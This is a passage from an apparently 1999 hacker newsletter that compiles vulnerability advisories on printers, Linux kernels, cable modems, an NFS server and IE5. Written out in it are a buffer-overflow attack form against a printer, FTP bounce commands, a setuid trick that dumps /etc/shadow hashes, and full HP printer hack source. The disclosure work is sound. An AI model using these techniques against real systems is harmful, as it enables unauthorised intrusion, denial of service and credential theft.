and you don't have accept entries for specific addresses or
for unused ppp or slip interfaces (and the used ones are
never unused or accept rules are safely removed at shutdown).

- you use 2.3.18 with ac6 patch (or higher).

- you use 2.2.13pre15 (or higher).

OPERATING SYSTEMS
Linux (any until recently)

POSSIBLE-WORK-AROUNDS
- Make so that SLIP and PPP support are not available
or
- Use deny default policy for input firewall, only allow for
specific address ranges and specific interfaces. For dynamic links
(such as SLIP or PPP), add an accept at link creation time, and
remove the entry when the link goes down.

FIX
- For 2.3.x, install 2.3.18 with the ac6 patch (or higher). Warning,
this is a DEVELOPMENT kernel.
- For 2.2.x, install 2.2.13pre15 or higher (e.g. 2.2.13).
- At this time no fix for 2.0.x. Please apply the above mentionned
work-arounds.

EXPLOIT
Please do not request exploit from the listed authors. Requests for
exploits will be ignored. A working exploit exists and has been
tested on current Linux distributions. It is possible that an
exploit be posted some time in the future (or that someone reads
this and does it by himself ...).

NOTES
This advisory is for information only. No warranty either expressed
or implied. Full disclosure and dissemination are allowed as long as
this advisory is published in full. No responsability will be taken
from abuse or lack of use of the information in this advisory.

@HWA

69.0 Nashuatec printer is vulnerable to various attacks
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://packetstorm.securify.com

hi,

The NASHUATEC D445 printer is vulnerabled to many attacks.
There are 4 communs services that run in a standard
configuration: httpd, ftpd, telnetd, printer.
(tested with nmap)

I discovered last day, at least three differents ways to
attack this kind of boxes.

First, it's possible to configure remotly the server via its
own admin web server (port 80).
Naturaly the server 'll ask u for an admin password before
submiting the form to the cgi. The password field is 15
chars length but an intruder with a lightly modified copy of
the original form 'll be able to submit many more chars (
about 260 will be enough for the test ) to the cgi and
produce a buffer overflow.( see the example below )
The cgi concerned is "reset" but i suppose, every cgi are
exposed to this problem.
If our intruder decide to forge a special password with
instruction code inside he'll force the remote printer to
execute code with the target web server priviledge.
I don't have, now, all the required informations to gain
server priviledge but u may find it here very soon :)

Attacker form example:

<HTML>
<HEAD>
<TITLE>Nashuadeath</TITLE>
</HEAD>
<!-- Gregory Duchemin Aka c3rber -->
<!-- NEUROCOM -->
<!-- http://www.neurocom.com -->
<!-- 179/181 Avenue Charles de Gaulle -->
<!-- 92200 Neuilly Sur Seine -->
<!-- Tel: 01.41.43.84.84 Fax: 01.41.43.84.80 -->
<BODY>
<HR>
<CENTER><FONT SIZE=+2><big><B>NIB
450-E</B></big></FONT></CENTER>
<HR>
<CENTER><FONT SIZE=+2>Unit Serial Number
599132</FONT></CENTER>
<HR>
<H2><CENTER>Reset Unit</H2>
<HR>
<FORM ENCTYPE="x-www-form-encoded" METHOD="POST"
ACTION="http://victim-printer-ip/Forms/reset">
<B>A very big password is required to perform this function
( at least 260 chars length ).</B><BR>
<BR>
<INPUT TYPE="text" NAME="http_pwd" SIZE="100"
MAXLENGTH="1500">
<BR>
<BR>
<INPUT TYPE="SUBMIT" NAME="Submit" VALUE="T3st M3 PL3ase">
</FORM>
<P>
<HR>
<P>
<CENTER>[ <A HREF="/index">Home</A> | <A HREF="/info">Unit
Info</A> ]
</CENTER>
</BODY>
</HTML>




another flaw is present in the ftp daemon that permit the
infamous "bounce attack".
ftp printer.victim.com
user xxxxx
pass xxxxx
quote port a1,a2,a3,a4,0,25

a1.a2.a3.a4 is every other ip adress.

the ftp server doesn't check neither the type of port in the
request ( < 1024 = administrative port ) nor the ip adress
used.
So an intruder may use the service to attack some ohter
boxes anonymously.


The last one is a denial of service with an icmp redirect
storm against the printer ip stack.
Use winfreez.c to test it.
The printer 'll not respond anymore during the attack.

Have a nice day,


Gregory Duchemin.

-------------------------
NEUROCOM
http://www.neurocom.com
179/181 Avenue Charles de Gaulle
92200 Neuilly Sur Seine
Tel: 01.41.43.84.84 Fax: 01.41.43.84.80

@HWA

70.0 xmonisdn bug
~~~~~~~~~~~~

http://packetstorm.securify.com

From: Ron van Daal <ronvdaal@SYNTONIC.NET>

Hello,

While playing with xmonisdn (included in the isdn4k-utils package),
I discovered a little bug. I didn't find anything regarding xmonisdn
in the Bugtraq archives, so here's a quick post.

I'm wondering if other xmonisdn users can reproduce this exploit.
(Tested on my workstation, which is running Red Hat Linux 6.0)

[syntonix@damien bin]# pwd; ls -al xmonisdn
/usr/bin
-rwsr-xr-x 1 root root 13528 Mar 4 1998 xmonisdn
[syntonix@damien bin]# xmonisdn -file /etc/shadow
Warning: Cannot convert string "netactive" to type Pixmap
Warning: Cannot convert string "netactiveout" to type Pixmap
Warning: Cannot convert sWarning: Cannot convert string "netstop" to type Pixmap

[1]+ Stopped xmonisdn -file /etc/shadow
[syntonix@damien bin]# bg
[1]+ xmonisdn -file /etc/shadow &
[syntonix@damien bin]# killall -8 xmonisdn
[1]+ Floating point exception(core dumped) xmonisdn -file /etc/shadow
[syntonix@damien bin]# strings core|less

<snip>
/lib/ld-linux.so.2
root:$1$Fijz9O0n$ku/VSK.h6cbTV5oueAAwz/:10883:0:99999:7:-1:-1:134538500
bin:*:10878:0:99999:7:::
daemon:*:10878:0:99999:7:::
adm:*:10878:0:99999:7:::
lp:*:10878:0:99999:7:::
sync:*:10878:0:99999:7:::
shutdown:*:10878:0:99999:7:::
halt:*:10878:0:99999:7:::
mail:*:10878:0:99999:7:::
news:*:108operator:*:10878:0:99999:7:::
games:*:10878:0:99999:7:::
gopher:*:10878:0:99999:7:::
ftp:*:10878:0:99999:7:::
nobody:*:10878:0:99999:7:::
xfs:!!:10878:0:99999:7:::
ronvdaal:$1$Dc92cqLj$V/HSANaVuwCMxGjFfZC/T0:10883:0:99999:7:-1:-1:134538492
syntonix:$1$h3yIM.h/$JjBLYPvb4Zcjv1tb.21Uw/:10883:0:99999:7:-1:-1:134538484
<snip>

--
Ron van Daal | Syntonic Internet | tel. +31(0)46-4230738
ronvdaal@syntonic.net | www.syntonic.ne

@HWA

71.0 Nasty stack smashing bug in Linux-2.2.12 execve
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://packetstorm.securify.com


From: ben@VALINUX.COM
Subject: execve bug linux-2.2.12


While doing some debugging, I discovered a really nasty stack smash bug in
linux-2.2.12. The I haven't checked previous versions of the 2.2 kernel
but bug appears to be fixed in linux-2.2.13pre17.

If I am reading this correctly, the implications of this bug could be
very dire. It may be possible to easily obtain root privilege on any
box running this kernel.

Basically the problem is that the execve system call checks that argv
is a valid pointer but it doesn't check that all of the pointers in
argv array are valid pointers. If you pass bad pointers into the
execve system call you can corrupt the processes stack before it
returns to user space. Then when the kernel hands off the process to
the elf loader code and which begins to setup the processes it can be
made to execute some malicious code in place of the program's main
function.

This is particularly scary because all of this occurs BEFORE the
program begins executing its main function and AFTER the program
returns to user space with privilege. Therefore no matter how well
audited the program may be it can be used as to gain privilege.

The thing that tipped me off to the problem was that a program that I
exec'd was getting killed with SIGSEGV in __libc_start_main before my
main function began running.

-ben


Per popular demand here is some more information on the bug I've been
observing. I'm sorry. I wish I had thought to include this in my
original post:

Here is one ltrace fragment where my program only corrupts one of the
parameters:

[pid 578] execv("/bin/grep", 0x7ffffcdc <unfinished ...>
[pid 578] __libc_start_main(0x0804a4e0, 200, 0x7fffb3a4, 0x08048bf4,
0x080516dc <unfinished ...>
[pid 578] --- SIGSEGV (Segmentation fault) ---
[pid 578] +++ killed by SIGSEGV +++
--- SIGCHLD (Child exited) ---

Here is some information from gdb:

(gdb) core-file /tmp/core
Core was generated by
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0 0x2aae60f6 in getenv (name=0x2aba8562 "LLOC_TRIM_THRESHOLD_")
at ../sysdeps/generic/getenv.c:88
../sysdeps/generic/getenv.c:88: No such file or directory.
(gdb) bt
#0 0x2aae60f6 in getenv (name=0x2aba8562 "LLOC_TRIM_THRESHOLD_")
at ../sysdeps/generic/getenv.c:88
#1 0x2aae689b in __secure_getenv (name=0x2aba8560
"MALLOC_TRIM_THRESHOLD_")
at secure-getenv.c:29
#2 0x2ab1e2e0 in ptmalloc_init () at malloc.c:1689
#3 0x2aade211 in __libc_preinit (argc=200, argv=0x7fffb3a4,
envp=0x7fffb6c8)
at set-init.c:26
#4 0x2aade030 in __libc_start_main (main=0x804a4e0 <strcpy+5500>,
argc=200,
argv=0x7fffb3a4, init=0x8048bf4, fini=0x80516dc <strcpy+34680>,
rtld_fini=0x2aab5ad4 <_dl_fini>, stack_end=0x7fffb39c)
at ../sysdeps/generic/libc-start.c:68
(gdb)

This was just one run. There were other runs where more interesting
things happened. There was one in particular where the pointer to init
was corrupted but I haven't been able to reproduce that one yet.

I put the source code for the program I was debugging at the time when
I stumbled into this at:
"<A TARGET=nonlocal
HREF="/external/ftp://ftp.bastille-linux.org/bastille/broken-fuzz.c.gz"">ftp://ftp.bastille-linux.org/bastille/broken-fuzz.c.gz"</A>.
Note: this
is not a working program!!! Do not take this as a release. I have
since fixed many bugs in it. I coded it up and was in the process of
making it work for the first time when I stumbled across this
problem. Its its current form its only purpose is to demonstrate the
problem that I saw. To trigger the problem simply run the program with
the -ba option and the name of your favorite exectuable. e.g.
"./fuzz -ba grep"

-ben

To: BugTraq
Subject: Re: execve bug linux-2.2.12
Date: Fri Oct 15 1999 19:20:14
Author: visi0n


Whoa, I think the kernel 2.0.38 has the same bug, and one more,
in the count() function to check how many argv's the bin have, he dont
check for max number of argv's. This is worse than the bug found in
2.2.12 execve().



To: BugTraq
Subject: Re: execve bug linux-2.2.12
Date: Sat Oct 16 1999 07:22:02
Author: Alan Cox


> Basically the problem is that the execve system call checks that argv
> is a valid pointer but it doesn't check that all of the pointers in
> argv array are valid pointers. If you pass bad pointers into the

This is incorrect. To start with - it builds the argv pointer array
itself. The passed array is simply used to get a list of strings
and to build them on the stack of the target process.

The argv and envp is then built by the ELF loader walking these tables
in order to generate the argv and envp arrays that the SYS5 ABI expects
to be passed (saner ABI's the user space start up builds argc/argv).

> execve system call you can corrupt the processes stack before it
> returns to user space. Then when the kernel hands off the process to

I don't think you can. The built ELF stack looks roughly like

[Environment] - null terminated string data
[Arguments] - null terminated string data
[Elf gloop]
[envp]
[argv]
[argc]
-> You are here

on entry, so the stack is fine.

> The thing that tipped me off to the problem was that a program that I
> exec'd was getting killed with SIGSEGV in __libc_start_main before my
> main function began running.

I would certainly be interested in an example that caused this. That there
could be a bug in the kernel or glibc exec building I can believe. Your
diagnosis of the cause however is dubious.

Alan


To: BugTraq
Subject: Re: execve bug linux-2.2.12
Date: Sat Oct 16 1999 14:13:19
Author: security@xirr.com


Caveat: I am running linux-2.2.12ow6 which contains
many security fixes, yet I believe my comments are still
valid. Also I am not a kernel guru.

> Basically the problem is that the execve system call
> checks that argv is a valid pointer but it doesn't check
> that all of the pointers in argv array are valid pointers.

The kernel copies each argv[i] into a contiguous chunk
of the (soon to be) stack. Thus it must dereference each
argv[i]. Check out linux/fs/exec.c line 261 for an almost
explicit dereference of argv[i] (memcpy(str,argv+i) except
kernel to user space version).

This is confirmed by a small test program:

#include "nolibc.h"
main(int argc, char** argv,char **envp) {
int i;
char buf[32];

argv[1]=2;
i=execve("/bin/sh",argv,envp);

/* we should never reach this point, but print
out errno in hexadecimal */
i=htonl(i);
i=itoh(&i,buf);
buf[i]='\n';
write(1,buf,i+1);
}


This program does not run /bin/sh but istead prints out the
message 0000000e representing errno=14, EFAULT.

This means the kernel got a segfault while copying the
argv[i]'s to the stack, and thus failed the syscall.

This program is linked with
'gcc -O -fno-builtin -nostdlib test.c'

nolibc.h is ugly but available by request under GPL. It
defines ntohl,itoh,write,execve, and _start.

Note execve, htonl, itoh, and write are macros. Execve/write
are direct system calls. (itoh converts 4 bytes to 8byte
hex representation and returns 8, htonl byte swaps so
the bytes come out in the right order).

> The thing that tipped me off to the problem was that a
> program that I exec'd was getting killed with SIGSEGV
> in __libc_start_main before my
> main function began running.

I'm not really sure if this is a widespread problem, but
ANYTIME libc gets hosed (malloc(-1) for example) gdb reports
the problem occuring in a function called from
__libc_start_main and does not ever mention main.

I'll study this a wee bit more, since the references I'm
using for the startup state don't seem to jive with my
experience. (Namely I never see an array of pointers
being setup in the docs, and my programs definately
do not do so, yet they function and dereference argv
as if it were an array of pointers).

Another remark: If I misunderstood the bug (like argv[1]=2
obviously is not valid, and is not what you meant) please
let me know.



Author: Matt Chapman


On Sat, Oct 16, 1999 at 02:22:02PM +0100, Alan Cox wrote:
>
> I would certainly be interested in an example that caused this.

#include <unistd.h>
#include <errno.h>

#define BADPTR (char *)0x10 /* for example */

int main(int argc, char **argv, char **envp)
{
char *args[7];
int i;

args[0] = "su";
for (i = 1; i < 6; i++) {
args[i] = BADPTR;
}
args[6] = NULL;

execve("/bin/su", args, envp);

printf("%s\n", strerror(errno));
return 1;
}

This program (on my system at least 5 bad arguments are needed)
reproducibly dies with SIGSEGV on 2.2.12. A similarly configured system
with kernel 2.0.36 correctly reports EFAULT.

This would not normally be a problem, however... the above program will
not dump core for an ordinary user, only root, which makes me believe that
the fault occurs after the process has gained the root euid from /bin/su.

A gdb trace suggests the usual heap corruption in glibc, which does not
seem to be related to the arguments passed to execve (as long as they are
bad), so I doubt this is exploitable. However it is most likely a bug
somewhere.

Matt



--
Matthew "Austin" Chapman
SysAdmin, Developer, Samba Team Member


@HWA

72.0 Finjan exploit alert
~~~~~~~~~~~~~~~~~~~~

http://packetstorm.securify.com

Finjan Software, Inc.
Malicious Code Exploit Alert

Finjan customers and partners,

There is a recent Trojan executable you should be aware of called
WinNT.Infis.

Through Finjan's proactive "sandbox" technology, executable files such
as the WinNT.Infis are monitored and blocked on the first attack. By
watching for violations of security policies, Finjan's SurfinShield
Corporate protects desktop and network computers from attacks by this
Trojan executable, as well as new variants of this malicious program,
without requiring users to download any software patch or anti-virus
pattern update.

WinNT.Infis is yet another example of Trojan executables that are
appearing more frequently. Please take proper precautions to educate
and protect your corporation and employees.

---------------------------------------------------------------
WinNT.Infis Trojan Executable
---------------------------------------------------------------

OVERVIEW

WinNT.Infis is an executable file with .EXE extension that installs
itself as a native Windows NT system driver. It is the first known
malicious program to install and run in Kernel mode under Windows NT.
That is, WinNT.Infis runs in the most sensitive part of the Windows NT
operating system. There has been speculation about the creation of a
Windows NT driver attack, but most experts believed that such an
attack was at least one or two years in the future. WinNT.Infis has
made theory into reality much sooner than expected.

WinNT.Infis Trojan is capable of infecting any executable files
(program) on the fly from Kernel mode.


TECHNICAL DESCRIPTION

Infis is a 32-bit Windows executable file that infects other Windows
executables. When the Trojan is executed, it creates the
HKLM\SYSTEM\CurrentControlSet\Services\inf entry in the Windows NT
registry and creates the system file INF.SYS in the
\WINNT\SYSTEM32\DRIVERS directory. The INF.SYS file is a native
Windows NT driver and is 4608 bytes.

When the system is rebooted the altered driver (INF.SYS) is loaded
automatically. This way the Trojan will be able to replicate to
accessed executable files on the fly. The Trojan replicates to
Windows executable applications that have .EXE extensions. The Trojan
does not infect the CMD.EXE and is unable to infect read-only files.

However, the Trojan has to be executed by an Administrator equivalent
user. Without such a right the code is unable to replicate because,
despite running in the kernel, it does not have a User mode
replication component.


HOW TO PROTECT YOURSELF

Finjan's SurfinShield Corporate
(http://www.finjan.com/products_home.cfm) will protect users from ALL
variants of this Trojan as well as new Trojan executables through its
proactive run-time monitoring technology that "sandboxes" executables
saved on PCs and blocks any executable that violates a security
policy.


Updated pattern databases from anti-virus vendors will block this
version of WinNT.Infis.exe.


ADDITIONAL INFORMATION

InfoWorld story (Oct. 8, 1999):
http://www.infoworld.com/cgi-bin/displayStory.pl?99108.enntvirus.htm


----------------------------------------------------------------------
PRIVACY AND UNSUBSCRIBE NOTICE

Finjan Software respects your right to online privacy. If you do not
wish to receive news or alert e-mails from us, simply reply to this
e-mail at: finjan@usmail.finjan.com and type "unsubscribe" in the
"subject" field.

@HWA

73.0 Hybrid network cablemodems
~~~~~~~~~~~~~~~~~~~~~~~~~~

http://packetstorm.securify.com

KSR[T] Security Advisories http://www.ksrt.org
Contact Account: ksrt@ksrt.org
Advisory Subscription: Send an empty message to:
ksrt-advisories-subscribe@ksrt.org
----

KSR[T] Advisory #012
Date: Oct. 6 1999
ID #: hybr-hsmp-012

Affected Program: Hybrid Network's Cable Modems

Author: David Goldsmith <dhg@ksrt.org>

Summary: Remote attackers can anonymously reconfigure any
Hybrid Network's cable modem that is running HSMP.
This can be used to steal information and
login/password pairs from cable modem users.

Problem Description: Hybrid Network's cable modems can be configured via
a UDP based protocol called HSMP. This protocol
does not require any authentication to perform
configuration requests. Since UDP is easily spoofed,
configuration changes can made anonymously.

Compromise: There are a plethora of denial of services attacks
involving bad configuration settings (ethernet
interfaces set to non-routable IP addresses, et al).
HSMP can also be used to configure the DNS servers
used by cable modem users, allowing attackers to
redirect cable modem subscribers to a trojan site.

More complex and theoretical attacks could involve
the running of actual code through the debugging
interface. This might allow remote attackers to
deploy ethernet sniffers on the cable modem.

Notes: KSR[T] found this vulnerability in parallel with
Paul S. Cosis <sili@l0pht.com> and the l0pht. We
would like to thank them for their input to this
advisory.

Patch/Fix: Cable providers should block out HSMP traffic
(7777/udp) on their firewalls.

Links: KSR[T] had initially written a demonstration
HSMP client which is located at:

http://www.ksrt.org/ksrt-hsmp.tar.gz

There is also another HSMP client located at:

http://www.larsshack.org/sw/ccm/

l0pht modified the above client and added
the ability to spoof the source address, allowing
for the anonymous reconfiguration of Hybrid cable
modems). Their client is located at:

http://c0re.l0pht.com/~sili/ccm-spoof.tar.gz
@HWA



74.0 HP Printer display hack (source code)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www3.l0pht.com/~sili/hp.c

/*
HP Printer Hack
12/8/97 sili@l0pht.com

Compile with -lsocket -lnsl on solaris.
Should compile fine on *BSD & linux.


*/

#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <stdio.h>

#define PORT 9100

int main (int argc, char *argv[]) {

int sockfd,len,bytes_sent; /* Sock FD */
struct hostent *host; /* info from gethostbyname */
struct sockaddr_in dest_addr; /* Host Address */
char line[100];

if (argc !=3) {
printf("HP Display Hack\n--sili@l0pht.com 12/8/97\n\n%s printer \"message\"\n",argv[0]);
printf("\tMessage can be up to 16 characters long (44 on 5si's)\n");
exit(1);
}

if ( (host=gethostbyname(argv[1])) == NULL) {
perror("gethostbyname");
exit(1);
}

printf ("HP Display hack -- sili@l0pht.com\n");
printf ("Hostname: %s\n", argv[1]);
printf ("Message: %s\n",argv[2]);

/* Prepare dest_addr */
dest_addr.sin_family= host->h_addrtype; /* AF_INET from gethostbyname */
dest_addr.sin_port= htons(PORT) ; /* PORT defined above */

/* Prepare dest_addr */
bcopy(host->h_addr, (char *) &dest_addr.sin_addr, host->h_length);

bzero(&(dest_addr.sin_zero), 8); /* Take care of sin_zero ??? */


/* Get socket */
/* printf ("Grabbing socket....\n"); */
if ((sockfd=socket(AF_INET,SOCK_STREAM,0)) < 0) {
perror("socket");
exit(1);
}

/* Connect !*/

printf ("Connecting....\n");

if (connect(sockfd, (struct sockaddr *)&dest_addr,sizeof(dest_addr)) == -1){
perror("connect");
exit(1);}

/* Preparing JPL Command */

strcpy(line,"\033%-12345X@PJL RDYMSG DISPLAY = \"");
strncat(line,argv[2],44);
strcat(line,"\"\r\n\033%-12345X\r\n");

/* Sending data! */

/* printf ("Sending Data...%d\n",strlen(line));*/
/* printf ("Line: %s\n",line); */
bytes_sent=send(sockfd,line,strlen(line),0);

printf("Sent %d bytes\n",bytes_sent);
close(sockfd);
}

@HWA

75.0 Omni-NFS/X Enterprise version 6.1
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://packetstorm.securify.com

Faulty software
---------------

Omni-NFS/X Enterprise version 6.1

Product
---------

Omni-NFS/X Enterprise is a X, NFS server solution for win32 systems.
It is written by XLink Technology ( http://www.xlink.com ) .

Vulnerability
-------------

The nfs daemon ( nfsd.exe ) used by Omni-NFS/X will jump to 100% cpu usage
if you scan it
using nmap with ether the -O (OS detect ) or the -sS ( TCP SYN (half open) )
.

Example :

(zorkeres@rh-mindlab)(Omni-X)(06/10/99) (1007)
$ nmap -O -p 111 slacky

Starting nmap V. 2.3BETA5 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
Interesting ports on slacky (192.168.1.2):
Port State Protocol Service
111 open tcp sunrpc

TCP Sequence Prediction: Class=trivial time dependency
Difficulty=2 (Trivial joke)
Remote operating system guess: Windows NT4 / Win95 / Win98

Nmap run completed -- 1 IP address (1 host up) scanned in 1 second
(zorkeres@rh-mindlab)(Omni-X)(06/10/99) (1008)
$

This was tested on Microsoft Windows NT 4.0 Workstation with SP5 .
I'm preaty sure all their NFS solutions are affected by this.

------------------------------------------------
Sacha Faust sfaust@isi-mtl.com
"He who despairs of the human condition is a coward, but he who has hope for
it is a fool. " - Albert Camus
Faulty software
---------------

Omni-NFS/X Enterprise version 6.1

Product
---------

Omni-NFS/X Enterprise is a X, NFS server solution for win32 systems.
It is written by XLink Technology ( http://www.xlink.com ) .

Vulnerability
-------------

The nfs daemon ( nfsd.exe ) used by Omni-NFS/X will jump to 100% cpu usage
if you scan it
using nmap with ether the -O (OS detect ) or the -sS ( TCP SYN (half open) )
.

Example :

(zorkeres@rh-mindlab)(Omni-X)(06/10/99) (1007)
$ nmap -O -p 111 slacky

Starting nmap V. 2.3BETA5 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
Interesting ports on slacky (192.168.1.2):
Port State Protocol Service
111 open tcp sunrpc

TCP Sequence Prediction: Class=trivial time dependency
Difficulty=2 (Trivial joke)
Remote operating system guess: Windows NT4 / Win95 / Win98

Nmap run completed -- 1 IP address (1 host up) scanned in 1 second
(zorkeres@rh-mindlab)(Omni-X)(06/10/99) (1008)
$

This was tested on Microsoft Windows NT 4.0 Workstation with SP5 .
I'm preaty sure all their NFS solutions are affected by this.

------------------------------------------------
Sacha Faust sfaust@isi-mtl.com
"He who despairs of the human condition is a coward, but he who has hope for
it is a fool. " - Albert Camus

@HWA

76.0 More IE5 vulnerabilities
~~~~~~~~~~~~~~~~~~~~~~~~

IE 5.0 security vulnerability - reading local (and from any domain,
probably window spoofing is possible) files using IFRAME and
document.execCommand

Disclaimer:
The opinions expressed in this advisory and program are my own and not
of any company.
The usual standard disclaimer applies, especially the fact that Georgi
Guninski
is not liable for any damages caused by direct or indirect use of the
information or functionality provided by this program.
Georgi Guninski, bears NO responsibility for content or misuse of this
program or any derivatives thereof.

Description:

Internet Explorer 5.0 under Windows 95 and WinNT 4.0 (suppose Win98 is
vulnerable)
allows reading local files, text and HTML files from any domain and
probably window spoofing (have not tested window spoofing but believe it
is possible)
It is also possible in some cases to read files behind fiewall.

Details:

The problem is the combination of IFRAME and document.execCommand.
Normally, you cannot use execCommand on an IFRAME from another domain.
But if you do:
"IFRAME.focus(); document.execCommand" then command will be executed in
the IFRAME
(some commands do not work in this way, but some do and that is enough).
So, we create an IFRAME with SRC="file://c:/test.txt" and inject
JavaScript code in it. When the
JavaScript code is executed, it is executed in the security context of
the IFRAME - the "file:" protocol.
The injection is done using the "InsertParagraph" command (guess other
commands will do) which sets the ID of the paragraph.
But if you place a " in the ID, then a STYLE tag may be inserted also.
The JavaScript code is injected using the STYLE tag:
STYLE="left:expression(eval(JSCode))"
This vulnerability may be exploited using HTML email message or a
newsgroup posting.

The code is:
----------------------------------------------------------------------------------------
<SCRIPT>
alert("Create text file c:\\test.txt and it will be read");
function f(

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT